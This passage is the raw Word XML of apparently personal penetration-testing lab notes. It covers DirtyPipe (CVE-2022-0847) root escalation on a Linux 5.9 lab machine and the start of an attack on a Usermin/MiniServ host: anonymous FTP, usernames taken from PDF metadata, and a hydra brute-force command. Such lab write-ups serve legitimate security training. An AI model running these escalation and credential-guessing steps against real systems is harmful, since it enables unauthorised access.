        <w:t xml:space="preserve">There were many ways to find this. First, we could have looked at the kernel using uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003904">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76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Linux XXXXXXXXX 5.9.0-050900-generic #202010112230 SMP Sun Oct 11 22:34:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003905">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux 5.9.0 is vulnerable to DirtyPipe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003906">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or looked at the CVE section of Linux Smart Enumeration (the CVE section is only available if you download lse.sh from the releases section instead of the main frontpage)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003907">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="760"/>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2476500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="377" name="image360.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image360.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1241"/>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3908">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or linPEAS, but dirtypipe was like the 4th of the 5 CVEs. So, I liked the first two ways better!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003909">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then to exploit it, I used the first one on github</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000390A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1242">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000390B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">it has two exploits, but the first one looks good since it resets root password and tries to open root shell, while the second one depends on an SUID binary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000390C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I first tried compiling it on the target, but it didn't work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000390D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So then I compiled it on Kali, and export to target, and ran it but then I was getting this error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000390E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76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./exploit-1: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./exploit-1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000390F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This meant that there was a gcc version problem. I learned from XXXXXXXXX-A that you can add the -static flag to fix it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003910">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit above has a .sh file that does the gcc, but it's just two lines, so I skipped that file and ran gcc manually with -static flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003911">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The original command was</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> gcc exploit-1.c -o exploit-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003912">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the command with -static flag that worked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003913">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76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gcc -static exploit-1.c -o exploit-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003914">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then I exported exploit-1 executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003915">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then I ran it and got this output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003916">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="760"/>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270000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="342" name="image338.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image338.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1243"/>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3917">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means it couldn't open shell, but it did seem to change root password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003918">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So I ran</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> su</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003919">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And password: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">piped</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000391A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And I got root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000391B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I then also tried exploit-2, which was cool and simple as well! Basically you have to download and compile it exactly like exploit-1, and then to use it, you just pass in the file of ANY SUID bit binary, and it will use that to open Root shell. It legit doesn't matter what SUID binary, it can be anything, as long as SUID bit set!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000391C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76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gcc -static exploit-1.c -o exploit-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000391D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="76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find / -perm -4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000391E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pick ANY file with SUID bit set</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000391F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="760"/>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./exploit-2 /usr/bin/sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003920">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="760"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/sudo was one example but I tried a bunch more and they all worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003921">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="760"/>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/usr/bin/su</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003922">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="760"/>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/usr/bin/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003923">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="760"/>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/snap/core20/1695/usr/bin/umount</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003924">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003925">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6wwi9dwxrfut" w:id="534"/>
      <w:bookmarkEnd w:id="534"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usermin (webmin, MiniServ)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003926">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX-C .157 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on port 20000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003927">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Firstly, we saw a port 80 that was useless.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003928">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And then we went to port 20000 which was a webserver, and it told us to go to XXXXXXXXX:20000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003929">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="109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333500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="277" name="image267.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image267.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1244"/>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392A">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But when we try accessing it we get an error. So, we have to add it to /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000392B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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sudo subl /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000392C">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Add this line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000392D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1098"/>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192.168.239.157 XXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000392E">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Then access the page:</w:t>
      </w:r>
      <w:hyperlink r:id="rId1245">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1246">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://XXXXXXXXX:20000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000392F">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You are met with a login page. I tried bruteforcing normal creds but nothing worked. I noticed the login page said "usermin" and in the autorecon output, in the "_patterns.log" we saw "Identified HTTP Server: MiniServ/1.820" and it listed some CVE. I then searched up MiniServ/1.820 exploits and it gave me usermin 1.820 exploits but they were authenticated so that means I need creds to login first</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003930">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I then logged into FTP as anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003931">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And then I saw backup folder, and downloaded all the PDFs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003932">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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prompt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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mget *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003934">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And then I looked at each PDF but they seemed like random templates. So, I tried inspecting metadata using exiftool and I found these:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003935">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="109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130800" cy="4064000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="254" name="image261.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image261.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1247"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="51308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3936">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The other PDFs had usernames as well</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003937">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So, I was supposed to use these usernames and try them on FTP and the webpage on port 20000 and attempt to use the username as the password as well, so cassie:cassie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003938">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You could have also bruteforced FTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003939">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="109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876300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="575" name="image563.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image563.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1248"/>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393A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1098"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ftp://192.168.236.157</w:t>
      </w:r>
    </w:p>
